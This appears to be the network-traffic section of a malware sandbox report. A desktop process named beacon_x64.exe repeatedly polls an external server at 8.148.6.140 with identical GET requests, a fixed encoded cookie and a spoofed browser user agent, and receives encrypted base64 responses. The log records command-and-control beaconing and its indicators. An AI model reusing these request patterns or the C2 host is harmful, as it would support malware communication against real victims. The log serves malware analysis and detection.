Jan 10, 2025 09:25:45.763552904 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:46.759440899 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:46 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:25:46.759577036 CET	344	IN	Data Raw: 67 7a 6e 6f 64 71 38 6f 75 5a 34 50 6b 66 55 47 36 59 45 7a 4e 55 35 31 45 75 6a 65 52 65 6b 6a 69 54 4c 6a 63 6a 64 65 59 72 43 54 73 6b 6c 35 6f 74 48 78 5a 36 76 55 53 79 74 51 47 53 37 56 6c 66 35 68 6e 5a 70 4d 61 43 66 4b 6e 55 6c 48 47 72 Data Ascii: gznodq8ouZ4PkfUG6YEzNU51EujeRekjiTLjcjdeYrCTskl5otHxZ6vUSytQGS7Vlf5hnZpMaCfKnUlHGrAO6fgxoL+iOBwLsayIeWBh4g+GgkuA46wSv3eAlA8fZYY8i8M5ZwyI+C4ERCvfqi6ZEEp24nhFFx5EOM6EW2GF+lNdVaPhrjzy0ivN8o0sUcdNZ0txNc6/aQyUZZovuO2xEpRivWvGFjVT+ZZ8a/jkGwqzg2+pxw8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50000	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:46.872667074 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50009	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:51.138451099 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:52.697487116 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:52 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2b 64 65 6d 33 37 4b 51 58 71 32 37 30 54 73 43 41 53 51 6f 65 4e 71 52 33 6d 37 37 4c 30 6a 59 34 75 4b 66 73 63 46 53 79 2b 65 39 6e 32 74 59 30 61 51 6d 37 39 52 54 63 54 5a 50 2b 4b 4f 54 44 33 38 48 69 56 4a 2f 6f 50 51 52 38 46 59 78 54 45 59 37 4a 41 47 4e 59 6f 30 59 53 57 31 6d 77 32 42 70 79 55 35 39 6b 61 76 43 5a 2b 57 37 62 41 58 67 68 4d 39 44 35 30 6f 68 49 42 69 67 6b 38 4d 69 43 4f 38 33 73 78 4c 49 55 69 49 7a 75 52 70 4a 38 59 77 62 42 63 57 6b 58 53 48 4b 2b 30 69 31 52 57 5a 64 71 4e 65 70 33 71 4f 31 64 57 30 49 34 7a 65 45 63 6a 4d 57 62 73 65 32 6c 76 73 64 79 63 43 49 6b 64 30 66 49 43 58 30 65 42 54 39 76 31 59 6f 4d 4e 48 42 6c 74 5a 30 4b 7a 64 41 7a 53 49 48 48 4b 2f 78 4f 4f 37 48 6f 73 30 72 76 44 73 46 2b 36 67 36 37 45 2f 2f 33 5a 37 2f 65 76 77 36 4b 46 71 66 66 73 43 41 57 4e 6f 76 67 71 46 72 63 45 59 68 71 31 49 79 33 70 42 39 67 39 37 46 51 31 45 36 56 36 37 72 4a 73 6d 49 63 43 38 33 53 61 5a 5a 53 74 71 4d Data Ascii: +dem37KQXq270TsCASQoeNqR3m77L0jY4uKfscFSy+e9n2tY0aQm79RTcTZP+KOTD38HiVJ/oPQR8FYxTEY7JAGNYo0YSW1mw2BpyU59kavCZ+W7bAXghM9D50ohIBigk8MiCO83sxLIUiIzuRpJ8YwbBcWkXSHK+0i1RWZdqNep3qO1dW0I4zeEcjMWbse2lvsdycCIkd0fICX0eBT9v1YoMNHBltZ0KzdAzSIHHK/xOO7Hos0rvDsF+6g67E//3Z7/evw6KFqffsCAWNovgqFrcEYhq1Iy3pB9g97FQ1E6V67rJsmIcC83SaZZStqM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50010	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:52.810017109 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:53.808669090 CET	421	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:53 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 69 5a 4b 4a 34 70 50 4d 6d 43 2b 33 41 67 77 51 53 44 6e 77 44 74 7a 61 54 4d 4a 32 69 4d 46 49 7a 6d 73 69 36 37 68 79 56 2f 70 72 39 6f 6e 35 39 44 66 32 44 66 4f 41 48 74 36 38 4a 68 68 78 4e 72 56 66 70 68 79 59 6c 54 4e 2f 4f 56 7a 35 55 38 50 4d 50 47 57 35 54 42 6e 54 43 58 4a 33 6d 79 6a 6c 31 57 34 6a 57 38 63 47 4b 4d 55 43 2f 71 75 79 44 75 51 34 50 79 52 63 57 35 59 6f 4a 54 6a 76 52 68 39 57 50 50 7a 78 4a 6d 47 73 51 36 31 45 4b 2f 2b 77 57 52 46 52 36 78 67 75 31 2f 58 69 30 79 52 54 59 6b 66 5a 56 63 2b 74 36 61 57 65 30 5a 5a 70 75 32 79 76 4c 55 73 55 30 32 30 34 35 2b 54 50 31 6c 43 63 4f 56 6e 6e 67 32 62 62 36 41 73 67 77 67 31 4c 75 4a 4e 52 6f 43 58 37 65 6f 6b 56 6d 47 45 3d Data Ascii: iZKJ4pPMmC+3AgwQSDnwDtzaTMJ2iMFIzmsi67hyV/pr9on59Df2DfOAHt68JhhxNrVfphyYlTN/OVz5U8PMPGW5TBnTCXJ3myjl1W4jW8cGKMUC/quyDuQ4PyRcW5YoJTjvRh9WPPzxJmGsQ61EK/+wWRFR6xgu1/Xi0yRTYkfZVc+t6aWe0ZZpu2yvLUsU02045+TP1lCcOVnng2bb6Asgwg1LuJNRoCX7eokVmGE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50011	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:53.923063993 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:54.939260960 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:54 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 48 6c 53 47 6f 4a 51 6d 61 50 35 37 70 74 6d 61 42 46 54 46 31 4e 5a 4c 50 41 66 45 70 66 4d 51 42 48 48 43 48 50 2b 45 6a 49 56 34 71 34 76 6e 51 56 62 37 2b 5a 6a 55 78 58 49 46 49 4b 50 6b 71 65 72 44 36 59 5a 53 49 69 31 31 36 71 36 74 58 6b 74 67 6e 32 35 67 62 73 71 49 6f 6b 4a 62 73 71 4e 39 32 30 49 38 51 75 49 3d Data Ascii: HlSGoJQmaP57ptmaBFTF1NZLPAfEpfMQBHHCHP+EjIV4q4vnQVb7+ZjUxXIFIKPkqerD6YZSIi116q6tXktgn25gbsqIokJbsqN920I8QuI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50012	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:55.060357094 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50013	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:59.174638987 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:00.145867109 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:59 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:00.145940065 CET	344	IN	Data Raw: 52 52 37 36 57 4d 55 2b 6f 53 61 6e 46 30 2f 47 75 2b 52 63 41 46 45 69 37 4a 45 68 79 45 48 4f 6a 43 59 4f 4b 4b 42 51 46 44 47 54 76 6b 67 49 4b 77 62 39 49 47 72 35 2f 7a 34 4f 43 46 6b 75 78 31 54 52 4c 51 56 2f 69 30 4a 72 44 68 46 66 36 35 Data Ascii: RR76WMU+oSanF0/Gu+RcAFEi7JEhyEHOjCYOKKBQFDGTvkgIKwb9IGr5/z4OCFkux1TRLQV/i0JrDhFf65xf1fEdU9B73oEVU6U0AcE+tJFpHtshPoHxM7Xhb5zWOhCYsaz8j+AVQMNfgEadF1G624IR5l4jr37n8S6EzofdZz7tjs6YEqvXMOAHy3EEo4IN/Ooh4Wqs4YRZrbGQ2CBbEhkTT5xH10Mzi1GW/5T+WkRrrCRXgX3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50014	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:00.263515949 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:01.230549097 CET	377	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:01 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 59 70 2b 68 57 54 63 7a 2f 69 32 2f 6c 6a 6a 61 45 35 46 78 69 7a 55 45 74 55 77 42 6a 54 67 75 75 68 33 4d 2f 63 43 31 33 32 61 74 45 6b 57 73 33 59 2b 79 50 6f 6d 57 38 74 2b 41 79 4c 61 43 6f 71 4a 47 72 54 51 77 6d 4b 6e 75 4e 4b 4d 6c 50 61 59 68 5a 77 56 65 31 69 43 68 79 48 42 61 66 57 79 75 56 34 58 43 31 64 4e 32 65 68 4c 31 6d 32 75 30 66 68 36 53 38 70 45 73 63 41 38 62 55 4f 66 77 35 4e 50 7a 33 36 56 76 49 34 39 32 79 6c 41 74 45 75 49 4d 57 51 4e 33 6f 6b 56 4f 31 79 38 6a 4c 55 74 79 6e 75 51 39 4d 7a 4c 6b 4a 35 76 38 50 6c 50 39 44 74 33 51 69 4c 62 65 Data Ascii: Yp+hWTcz/i2/ljjaE5FxizUEtUwBjTguuh3M/cC132atEkWs3Y+yPomW8t+AyLaCoqJGrTQwmKnuNKMlPaYhZwVe1iChyHBafWyuV4XC1dN2ehL1m2u0fh6S8pEscA8bUOfw5NPz36VvI492ylAtEuIMWQN3okVO1y8jLUtynuQ9MzLkJ5v8PlP9Dt3QiLbe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50016	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:01.429548025 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:02.395895004 CET	441	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:02 GMT Server: nginx Content-Length: 256 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2f 52 62 71 4b 35 6f 73 6e 38 72 53 2b 42 31 77 5a 4b 63 51 6e 71 62 6c 7a 48 35 61 73 51 6e 4e 4e 37 36 6b 6e 72 75 51 30 56 77 44 59 78 61 70 45 6e 49 65 55 73 63 55 63 63 65 49 4c 6e 38 64 6d 54 6a 74 4f 4b 67 49 69 75 67 4f 64 6a 55 44 39 76 6d 4b 76 41 37 79 50 53 68 32 37 2f 65 66 61 62 43 4f 51 68 62 54 70 74 61 67 64 68 53 44 32 63 51 52 78 6c 38 6a 55 39 2b 77 39 63 49 52 45 64 4d 76 36 70 68 69 57 4b 4e 58 48 47 6c 6c 50 63 64 36 77 4f 48 7a 6a 6b 66 66 30 49 48 51 36 38 71 42 79 55 49 75 42 41 6b 74 52 79 58 48 71 46 7a 6d 4e 31 45 69 66 66 63 4e 51 61 4e 34 4d 48 74 78 78 52 68 71 41 4f 74 2b 58 74 6e 4b 67 67 53 56 46 44 68 2f 58 38 79 51 30 41 64 6a 65 6d 41 72 51 64 33 6b 32 45 38 34 37 79 57 4f 65 34 6e 79 62 59 48 6e 4f 30 65 67 78 32 4c 34 Data Ascii: /RbqK5osn8rS+B1wZKcQnqblzH5asQnNN76knruQ0VwDYxapEnIeUscUcceILn8dmTjtOKgIiugOdjUD9vmKvA7yPSh27/efabCOQhbTptagdhSD2cQRxl8jU9+w9cIREdMv6phiWKNXHGllPcd6wOHzjkff0IHQ68qByUIuBAktRyXHqFzmN1EiffcNQaN4MHtxxRhqAOt+XtnKggSVFDh/X8yQ0AdjemArQd3k2E847yWOe4nybYHnO0egx2L4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50017	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:02.544296026 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:04.144680023 CET	569	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:03 GMT Server: nginx Content-Length: 384 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 31 30 58 72 38 78 71 39 4b 67 71 70 5a 62 47 72 35 48 61 45 2b 56 75 46 65 54 76 74 4d 4c 4f 4c 6b 46 63 53 54 70 41 32 50 53 74 71 6e 30 52 74 58 6c 53 4e 79 2f 50 56 75 31 67 7a 4f 43 45 39 59 6d 6c 53 2b 57 4a 4c 6f 43 48 64 6b 59 51 38 54 37 31 79 48 38 31 37 2b 4c 37 59 6f 6a 49 67 45 75 35 6c 70 63 77 75 73 54 72 4c 48 64 6a 71 2f 4a 2b 79 48 51 55 38 6f 43 38 52 58 41 46 48 7a 79 30 62 64 4f 57 2b 55 61 4b 66 73 38 70 46 6f 6b 67 35 73 77 68 68 7a 4f 38 41 44 4f 54 37 5a 38 54 53 79 50 65 4e 74 66 4e 70 72 43 73 6a 58 41 2f 6b 71 6f 38 4a 54 71 4c 48 6e 55 4c 33 77 49 37 50 61 42 48 76 67 72 61 55 4a 2b 64 72 5a 6f 55 78 50 6a 32 59 6d 58 38 6f 73 63 41 4f 4c 61 4f 43 6a 41 4a 39 4a 5a 71 6f 76 52 4d 48 50 30 6d 46 35 47 4c 4c 68 4c 73 64 58 74 32 2f 42 68 70 75 4b 56 41 51 37 6e 6c 7a 48 62 32 68 57 30 6e 43 79 79 79 54 6f 57 6b 2b 55 6f 59 4c 52 4f 65 2b 2b 77 62 61 6c 6b 36 38 38 58 4d 34 6d 58 49 75 51 35 34 54 4d 61 34 4c 58 4b 56 37 34 6d 4a 61 78 32 71 52 47 38 66 42 56 50 4c 73 68 78 [TRUNCATED] Data Ascii: 10Xr8xq9KgqpZbGr5HaE+VuFeTvtMLOLkFcSTpA2PStqn0RtXlSNy/PVu1gzOCE9YmlS+WJLoCHdkYQ8T71yH817+L7YojIgEu5lpcwusTrLHdjq/J+yHQU8oC8RXAFHzy0bdOW+UaKfs8pFokg5swhhzO8ADOT7Z8TSyPeNtfNprCsjXA/kqo8JTqLHnUL3wI7PaBHvgraUJ+drZoUxPj2YmX8oscAOLaOCjAJ9JZqovRMHP0mF5GLLhLsdXt2/BhpuKVAQ7nlzHb2hW0nCyyyToWk+UoYLROe++wbalk688XM4mXIuQ54TMa4LXKV74mJax2qRG8fBVPLshxkuHBv16qHGR2HXeoFTfC9PBpEet9FAnefZh1UfSPkUc1c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50018	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:04.263178110 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50019	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:08.516064882 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:12.483911037 CET	549	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:12 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 73 56 41 45 48 45 75 34 70 65 6c 42 42 64 64 4e 54 37 6a 63 56 62 70 74 72 59 43 4d 42 47 51 64 45 77 4d 6e 45 75 65 59 2b 4c 6b 6a 58 61 57 43 53 43 65 79 4d 2f 77 46 71 49 38 7a 36 45 53 7a 31 41 74 6c 54 56 2b 38 35 6d 71 64 59 6d 31 4a 75 39 2b 76 66 66 5a 75 6e 30 65 74 78 68 34 47 61 4b 35 61 55 4b 75 2f 6a 51 73 39 45 39 32 63 43 64 4f 39 43 51 64 57 4e 30 42 4c 58 61 77 50 62 52 30 7a 39 57 58 48 41 58 67 56 4a 45 42 72 39 34 56 6e 35 74 2f 35 61 57 44 67 54 66 6b 4e 6f 66 69 33 36 4b 2f 62 50 55 70 76 49 74 5a 37 43 46 47 48 64 4a 39 68 2f 6a 51 63 56 55 41 69 30 70 43 6e 49 33 64 65 42 4a 77 76 55 33 30 2b 58 6e 72 30 52 69 69 77 49 61 59 64 75 77 51 39 65 35 38 68 73 70 63 57 4e 79 2b 72 6e 64 54 44 4e 31 59 38 71 55 74 35 61 46 34 74 50 38 31 38 75 6c 32 55 49 5a 65 46 47 67 33 72 63 33 35 51 51 71 66 78 2f 46 39 75 42 36 4a 41 78 53 52 2f 5a 35 64 65 2b 4e 36 66 4f 6e 4e 31 73 61 38 75 4a 73 53 75 4c 51 4f 59 77 52 64 64 76 30 51 4f 41 71 37 75 47 34 31 68 4e 55 49 41 6c 54 63 57 2b 36 [TRUNCATED] Data Ascii: sVAEHEu4pelBBddNT7jcVbptrYCMBGQdEwMnEueY+LkjXaWCSCeyM/wFqI8z6ESz1AtlTV+85mqdYm1Ju9+vffZun0etxh4GaK5aUKu/jQs9E92cCdO9CQdWN0BLXawPbR0z9WXHAXgVJEBr94Vn5t/5aWDgTfkNofi36K/bPUpvItZ7CFGHdJ9h/jQcVUAi0pCnI3deBJwvU30+Xnr0RiiwIaYduwQ9e58hspcWNy+rndTDN1Y8qUt5aF4tP818ul2UIZeFGg3rc35QQqfx/F9uB6JAxSR/Z5de+N6fOnN1sa8uJsSuLQOYwRddv0QOAq7uG41hNUIAlTcW+6iRyEX6W2j/uCOCo0CqcEmnw+M=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50020	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:12.592144012 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:13.553263903 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:13 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6a 53 42 63 51 52 6c 43 56 6d 73 67 4c 4b 32 55 5a 66 71 37 79 30 54 71 68 65 68 78 46 76 43 51 62 38 5a 64 57 64 31 4c 6c 6c 6c 39 57 58 56 47 63 54 65 55 67 55 30 5a 30 73 31 79 65 56 67 73 5a 74 66 56 49 78 6b 6a 42 45 73 2b 47 31 71 31 63 43 47 62 64 6b 56 6a 7a 73 52 79 42 68 71 4c 47 68 6d 46 37 6f 73 44 63 38 34 62 33 59 36 53 53 39 70 4a 37 69 66 72 57 36 43 6f 79 41 41 56 42 4c 75 62 31 62 43 35 48 39 47 79 55 30 4c 4d 68 78 76 6d 36 41 3d 3d Data Ascii: 